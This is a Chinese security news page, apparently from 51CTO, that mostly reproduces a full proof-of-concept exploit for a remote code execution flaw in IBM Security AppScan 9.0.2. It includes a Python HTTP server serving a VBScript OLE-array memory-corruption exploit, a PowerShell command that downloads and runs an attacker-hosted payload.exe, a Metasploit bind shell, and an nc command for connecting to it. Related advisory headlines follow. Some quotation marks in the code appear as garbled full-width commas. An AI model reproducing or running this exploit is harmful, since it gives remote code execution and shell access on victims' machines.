IBM Security AppScan 9.0.2远程代码执行漏洞(含POC)

IBM Security AppScan Standard是美国IBM公司的一套Web应用的安全测试工具。该工具可在应用开发生命周期中进行自动化动态和静态安全漏洞扫描。该漏洞基于Windows OLE自动化数组远程代码执行漏洞，远程攻击者可利用此漏洞执行任意代码。

视频演示

漏洞POC

#!/usr/bin/pythonimport BaseHTTPServer, socket

### IBM Security AppScan Standard OLE Automation Array Remote Code Execution## Author: Naser Farhadi# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909## Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7## Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix ;)# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And# Metasploit windows/shell_bind_tcp Executable Payload## Usage:#       chmod +x appscan.py#       ./appscan.py## Video: http://youtu.be/hPs1zQaBLMU       ...#       nc 172.20.10.14 333##class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
        req.send_response(200)
        if req.path == "/payload.exe":
            req.send_header(，Content-type，, ，application/exe，)
            req.end_headers()
            exe = open("payload.exe", ，rb，)
            req.wfile.write(exe.read())
            exe.close()
        else:
            req.send_header(，Content-type，, ，text/html，)
            req.end_headers()
            req.wfile.write("""Please scan me!
                            <SCRIPT LANGUAGE="VBScript">
                            function runmumaa() 
                            On Error Resume Next
                            set shell=createobject("Shell.Application")
                            command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile(，http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe，,\
                            ，payload.exe，);$(New-Object -com Shell.Application).ShellExecute(，payload.exe，);"
                            shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
                            end function

                            dim   aa()
                            dim   ab()
                            dim   a0
                            dim   a1
                            dim   a2
                            dim   a3
                            dim   win9x
                            dim   intVersion
                            dim   rnda
                            dim   funclass
                            dim   myarray

                            Begin()

                            function Begin()
                              On Error Resume Next
                              info=Navigator.UserAgent

                              if(instr(info,"Win64")>0)   then
                                 exit   function
                              end if

                              if (instr(info,"MSIE")>0)   then 
                                         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
                              else
                                 exit   function  
                                         
                              end if

                              win9x=0

                              BeginInit()
                              If Create()=True Then
                                 myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

                                 if(intVersion<4) then
                                     document.write("<br> IE")
                                     document.write(intVersion)
                                     runshellcode()                    
                                 else  
                                      setnotsafemode()
                                 end if
                              end if
                            end function

                            function BeginInit()
                               Randomize()
                               redim aa(5)
                               redim ab(5)
                               a0=13+17*rnd(6)
                               a3=7+3*rnd(5)
                            end function

                            function Create()
                              On Error Resume Next
                              dim i
                              Create=False
                              For i = 0 To 400
                                If Over()=True Then
                                ，   document.write(i)     
                                   Create=True
                                   Exit For
                                End If 
                              Next
                            end function

                            sub testaa()
                            end sub

                            function mydata()
                                On Error Resume Next
                                 i=testaa
                                 i=null
                                 redim  Preserve aa(a2)  
                              
                                 ab(0)=0
                                 aa(a1)=i
                                 ab(0)=6.36598737437801E-314

                                 aa(a1+2)=myarray
                                 ab(2)=1.74088534731324E-310  
                                 mydata=aa(a1)
                                 redim  Preserve aa(a0)  
                            end function 

                            function setnotsafemode()
                                On Error Resume Next
                                i=mydata()  
                                i=readmemo(i+8)
                                i=readmemo(i+16)
                                j=readmemo(i+&h134)  
                                for k=0 to &h60 step 4
                                    j=readmemo(i+&h120+k)
                                    if(j=14) then
                                          j=0          
                                          redim  Preserve aa(a2)             
                                 aa(a1+2)(i+&h11c+k)=ab(4)
                                          redim  Preserve aa(a0)  

                                 j=0 
                                          j=readmemo(i+&h120+k)   
                                     
                                           Exit for
                                       end if

                                next 
                                ab(2)=1.69759663316747E-313
                                runmumaa() 
                            end function

                            function Over()
                                On Error Resume Next
                                dim type1,type2,type3
                                Over=False
                                a0=a0+a3
                                a1=a0+2
                                a2=a0+&h8000000
                              
                                redim  Preserve aa(a0) 
                                redim   ab(a0)     
                              
                                redim  Preserve aa(a2)
                              
                                type1=1
                                ab(0)=1.123456789012345678901234567890
                                aa(a0)=10
                                      
                                If(IsObject(aa(a1-1)) = False) Then
                                   if(intVersion<4) then
                                       mem=cint(a0+1)*16             
                                       j=vartype(aa(a1-1))
                                       if((j=mem+4) or (j*8=mem+8)) then
                                          if(vartype(aa(a1-1))<>0)  Then    
                                             If(IsObject(aa(a1)) = False ) Then             
                                               type1=VarType(aa(a1))
                                             end if               
                                          end if
                                       else
                                         redim  Preserve aa(a0)
                                         exit  function

                                       end if 
                                    else
                                       if(vartype(aa(a1-1))<>0)  Then    
                                          If(IsObject(aa(a1)) = False ) Then
                                              type1=VarType(aa(a1))
                                          end if               
                                        end if
                                    end if
                                end if
                                          
                                
                                If(type1=&h2f66) Then         
                                      Over=True      
                                End If  
                                If(type1=&hB9AD) Then
                                      Over=True
                                      win9x=1
                                End If  

                                redim  Preserve aa(a0)          
                                    
                            end function

                            function ReadMemo(add) 
                                On Error Resume Next
                                redim  Preserve aa(a2)  
                              
                                ab(0)=0   
                                aa(a1)=add+4     
                                ab(0)=1.69759663316747E-313       
                                ReadMemo=lenb(aa(a1))  
                               
                                ab(0)=0    
                             
                                redim  Preserve aa(a0)
                            end function

                            </script>""")if __name__ == ，__main__，:
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass

server.server_close()

作者：小歪

来源：51CTO

时间： 2024-11-16 21:28:54

IBM Security AppScan 9.0.2远程代码执行漏洞(含POC)的相关文章

PayPal曝远程代码执行漏洞(含视频)

日前知名在线支付公司PayPal被曝存在严重的远程代码执行漏洞,攻击者可以利用该漏洞在PayPal的web应用服务器上执行恶意命令,最终获得服务器控制权限. 漏洞描述这个远程代码执行漏洞由独立安全研究员Milan A Solanki发现,被Vulnerability Lab评为严重,通用漏洞评分系统(CVSS)分数达到了9.3,漏洞影响了PayPal的在线营销web应用服务器. 该漏洞存在于服务器中的Java调试线协议(Java Debug Wire Protocol, JDWP),攻击者可以

IIS 6.0曝远程代码执行漏洞安全狗可拦截

IIS 6.0 被曝出远程 0day,目前已经出现远程利用代码,针对 windows server 2003可以稳定利用,可以远程执行任意代码. 据报告称去年七月起就有攻击者开始利用.建议大家通过扫描检查相关业务系统,并增加 waf 规则或禁用 webdav 特性. 漏洞描述:微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以"If:由于开启WebDAV服务就

firefox远程代码执行漏洞CVE-2017-7801 即便失败也可以DoS 55版本之前大多受影响

Firefox发布公告称,firefox 55版本之前存在远程代码执行漏洞CVE-2017-7801,当在窗口调整大小时, 在仍在使用中更新的样式对象的情况下, 对选取框元素进行重新布局时, 可能会出现一个使用 after-free 的漏洞.这将导致潜在的可利用的崩溃. https://www.mozilla.org/en-US/security/advisories/mfsa2017-18/ Mozilla Firefox远程代码执行漏洞CVE-2017-7801 SecurityFocus评

IIS 6.0 WebDAV远程代码执行0day漏洞 CVE-2017-7269 PoC已经公开了但Windows 2003已经没有更新服务了

3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269,CNNVD-201703-1151),PoC开始流传,但糟糕的是这产品已经停止更新了,建议大家要么关闭IIS 下的WebDAV服务,要么升级到Windows 2016.绿盟科技发布威胁预警通告,全文如下. Update: 绿盟科技已经发布了该漏洞的分析及防护方案 Microsoft Windows Server 2003 R2 IIS 6.0远程代码执行威胁预警通告 3月27日,Zh

HPE Aruba AirWave Glass产品远程代码执行漏洞CVE-2017-8946 1.0.0及1.0.1版本均受影响

AirWave网络管理平台提供有线和无线网络的可见性,支持移动设备和应用程序.HPE Aruba已经提供了AirWave Glass升级版本1.0.1-1,绿盟科技发布< HPE Aruba AirWave Glass远程代码执行漏洞安全威胁通告 >. HPE Aruba AirWave Glass远程代码执行漏洞安全威胁通告当地时间2017年5月24日(北京时间2017年5月25日),HP官方发布安全通告,披露了一个关于 HPE Aruba AirWave Glass产品存在远程代码执行的

绿盟科技网络安全威胁周报2017.10 请关注Struts2远程代码执行漏洞CVE-2017-5638

绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-10,绿盟科技漏洞库本周新增32条,其中高危1条.本次周报建议大家关注 Struts2 远程代码执行漏洞 CVE-2017-5638 .攻击者通过恶意的Content-Type值,可导致远程代码执行.目前,Apache官方已针对该漏洞已经发布安全公告和补丁.请受影响用户及时检查升级,修复漏洞. 焦点漏洞 Struts2 远程代码执行漏洞 NSFOCUS ID 36031 CVE ID CVE-2017-5638 受影响版本 Struts

绿盟科技网络安全威胁周报2017.12 关注fastjson远程代码执行漏洞漏洞细节以及利用工具已经曝光

绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-12,绿盟科技漏洞库本周新增44条,其中高危12条.本次周报建议大家关注 fastjson远程代码执行 .目前漏洞细节已经披露,可导致大规模对此漏洞的利用.强烈建议用户检查自己使用的fastjson是否为受影响的版本,如果是,请尽快升级. 焦点漏洞 fastjson远程代码执行 NSFOCUS ID 无 CVE ID 无受影响版本 1.2.24及之前版本漏洞点评 fastjson在反序列化时存在安全漏洞,攻击者可以通过提交一个精心构造

Adobe Flash Player多个远程代码执行漏洞绿盟科技发布安全威胁通告

2016年11月8日(当地时间),Adobe官方网站发布了一个关于Adobe Flash Player产品的安全通告.通告中公布了9个漏洞,涉及到的平台包括Windows,Macintosh,Linux以及Chrome OS.利用这些漏洞时需要被攻击目标访问一个恶意页面或打开一个恶意文件.成功利用这些漏洞后,均可以导致远程代码执行.这9个漏洞的编号如下: CVE-2016-7857 CVE-2016-7858 CVE-2016-7859 CVE-2016-7860 CVE-2016-7861 C

思科在Chrome和火狐浏览器上的WebEx扩展有远程代码执行漏洞CVE-2017-6753

思科 WebEx 扩展再曝严重的远程代码执行漏洞 , 今年再曝严重的远程代码执行漏洞(CVE-2017-6753),这是本年度第二次发现该扩展存在漏洞.攻击者可利用该漏洞在目标机器上以受影响浏览器权限远程执行恶意代码. 思科WebEx扩展远程代码执行漏洞CVE-2017-6753 思科发布的安全通告中这样描述该漏洞 : " 思科用于 Google Chrome 和 Mozilla Firefox 浏览的 WebEx 扩展存在漏洞 , 允许远程未认证攻击者以受影响浏览器权限在受影响系统中执行任意